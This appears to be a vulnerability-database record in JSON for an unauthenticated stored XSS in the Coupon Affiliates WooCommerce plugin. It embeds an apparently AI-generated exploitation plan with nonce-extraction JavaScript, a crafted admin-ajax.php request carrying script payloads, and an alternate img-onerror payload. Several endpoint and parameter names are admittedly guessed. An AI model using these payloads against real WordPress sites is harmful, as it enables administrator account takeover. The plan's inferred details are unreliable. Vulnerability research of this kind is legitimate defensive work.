[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcffdtFaTxSEOS2fitVjuxIHKP5Tqd6XFHarh0VtBjSo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-40770","coupon-affiliates-affiliate-plugin-for-woocommerce-unauthenticated-stored-cross-site-scripting","Coupon Affiliates – Affiliate Plugin for WooCommerce \u003C= 7.5.3 - Unauthenticated Stored Cross-Site Scripting","The Coupon Affiliates – Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 7.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","woo-coupon-usage",null,"\u003C=7.5.3","7.6.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 00:00:00","2026-04-30 14:42:33",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa33a846c-6489-4337-b59e-b969ff03dbcd?source=api-prod",10,[22,23,24,25,26,27,28,29],"css\u002Fadmin-style.css","css\u002Fadmin-view-affiliate.css","css\u002Fstyle.css","freemius\u002Fassets\u002Fjs\u002Fpricing\u002Ffreemius-pricing.js","freemius\u002Fincludes\u002Fclass-freemius.php","freemius\u002Fincludes\u002Fclass-fs-plugin-updater.php","freemius\u002Fincludes\u002Ffs-essential-functions.php","freemius\u002Fincludes\u002Fmanagers\u002Fclass-fs-contact-form-manager.php","researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2026-40770**, an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in the **Coupon Affiliates** plugin for WordPress.\n\n---\n\n### 1. Vulnerability Summary\nThe **Coupon Affiliates – Affiliate Plugin for WooCommerce** (versions \u003C= 7.5.3) fails to properly sanitize and escape user-supplied input during the unauthenticated affiliate registration or tracking process. An attacker can submit a malicious payload (e.g., in registration fields or referral parameters) which is stored in the database. When a site administrator views the affiliate details in the admin dashboard (as evidenced by `css\u002Fadmin-view-affiliate.css`), the payload executes in the administrator's browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php` (AJAX-based registration) or the registration page itself.\n*   **Action**: `wcusage_register_affiliate` (unauthenticated AJAX action, inferred from standard plugin patterns).\n*   **Vulnerable Parameters**: Registration fields such as `wcu_first_name`, `wcu_last_name`, `wcu_user_login`, or metadata fields like \"Website URL\".\n*   **Authentication Level**: Unauthenticated (no account required).\n*   **Preconditions**: \n    *   WooCommerce must be installed and active.\n    *   Affiliate registration must be enabled in the plugin settings (usually default or easily toggled).\n\n### 3. Code Flow (Inferred)\n1.  **Submission**: An unauthenticated user submits the affiliate registration form.\n2.  **Processing**: The plugin captures the data via a `wp_ajax_nopriv_wcusage_register_affiliate` hook.\n3.  **Storage**: The input is stored using `update_user_meta()` or inserted into a custom table (e.g., `wp_wcusage_affiliates`) without passing through `sanitize_text_field()` or `wp_kses()`.\n4.  **Admin Access**: An administrator navigates to **Coupon Affiliates > Affiliates** and clicks on the malicious affiliate.\n5.  **Rendering**: The file responsible for rendering the admin view (associated with `css\u002Fadmin-view-affiliate.css` and the hook `admin_page_wcusage_view_affiliate`) echoes the stored data directly.\n6.  **Sink**: `echo $stored_metadata;` (lacking `esc_html()` or `esc_attr()`).\n\n### 4. Nonce Acquisition Strategy\nThe registration form likely requires a security nonce to prevent CSRF, but the nonce itself is typically exposed on the registration page to unauthenticated users.\n\n**Steps to obtain the nonce:**\n1.  **Identify Shortcode**: The plugin uses the shortcode `[coupon_affiliates_registration]` to display the registration form.\n2.  **Create Test Page**: \n    ```bash\n    wp post create --post_type=page --post_title=\"Affiliate Reg\" --post_status=publish --post_content='[coupon_affiliates_registration]'\n    ```\n3.  **Navigate and Extract**: Use the `browser_navigate` tool to go to the newly created page.\n4.  **Identify Variable**: Look for a localized script object. Based on common patterns in this plugin, search for:\n    *   `wcusage_registration_params`\n    *   `wcusage_ajax_obj`\n5.  **Execution Agent Command**:\n    ```javascript\n    \u002F\u002F Run in browser_eval to find the nonce\n    const nonce = window.wcusage_registration_params?.nonce || \n                  window.wcusage_ajax_obj?.nonce || \n                  document.querySelector('input[name=\"_wpnonce\"]')?.value;\n    return nonce;\n    ```\n\n### 5. Exploitation Strategy\n1.  **Identify Target Action**: Verify if the registration uses `admin-ajax.php` with `action=wcusage_register_affiliate`.\n2.  **Construct Payload**:\n    *   **Payload**: `\u003Cscript>alert(document.domain);\u003C\u002Fscript>` (or a more complex admin-takeover payload).\n    *   **Parameter**: `wcu_first_name` or `wcu_last_name`.\n3.  **Submit Request**: Use `http_request` to simulate the form submission.\n    *   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method**: `POST`\n    *   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n    *   **Body**:\n        ```text\n        action=wcusage_register_affiliate&wcu_first_name=\u003Cscript>alert('XSS')\u003C\u002Fscript>&wcu_last_name=Attacker&wcu_user_login=evil_affiliate&wcu_user_email=evil@example.com&wcu_coupon_code=HACKED&_wpnonce=[EXTRACTED_NONCE]\n        ```\n4.  **Trigger Execution**:\n    *   Log in as an Administrator using `browser_navigate`.\n    *   Navigate to the affiliate management page: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wcusage_affiliates`.\n    *   View the newly created \"Affiliate\".\n\n### 6. Test Data Setup\n1.  **Active Dependencies**:\n    ```bash\n    wp plugin install woocommerce --activate\n    wp plugin activate woo-coupon-usage\n    ```\n2.  **Configure Plugin**: Ensure registration is public.\n    ```bash\n    wp option update wcusage_options '{\"enable_registration\":\"1\"}' --format=json\n    ```\n3.  **Page Creation**: Create the page with `[coupon_affiliates_registration]` for nonce extraction.\n\n### 7. Expected Results\n*   **Submission Response**: The AJAX request should return a success message or a redirect status.\n*   **Stored State**: The payload `\u003Cscript>alert('XSS')\u003C\u002Fscript>` should be visible in the database (e.g., in `wp_usermeta` for the new user).\n*   **Execution**: When the admin views the \"Affiliates\" page, a browser alert with 'XSS' should appear.\n\n### 8. Verification Steps\n1.  **Database Check**:\n    ```bash\n    wp user get evil_affiliate --fields=ID\n    wp user meta get [USER_ID] first_name\n    ```\n    Confirm that the value contains the raw `\u003Cscript>` tag.\n2.  **Admin UI Check**: Use `browser_navigate` to the admin affiliate view and use `browser_eval` to check for the presence of the script in the DOM.\n\n### 9. Alternative Approaches\nIf the registration AJAX endpoint is not the primary sink:\n*   **Referral Tracking**: Test the `wcu_ref` or `coupon` URL parameters.\n    *   URL: `http:\u002F\u002Flocalhost:8080\u002F?wcu_ref=\u003Cimg src=x onerror=alert(1)>`\n    *   Check if the \"Referral Visits\" or \"Recent Clicks\" section in the admin dashboard (Coupon Affiliates > Dashboard) renders this value unsanitized.\n*   **Affiliate Settings**: If an affiliate can edit their own profile\u002Fsettings in a frontend dashboard, test those fields for XSS that triggers when the admin views the affiliate's profile.","gemini-3-flash-preview","2026-05-04 19:06:20","2026-05-04 19:06:51",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","7.5.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-coupon-usage\u002Ftags\u002F7.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-coupon-usage.7.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-coupon-usage\u002Ftags\u002F7.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-coupon-usage.7.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-coupon-usage\u002Ftags"]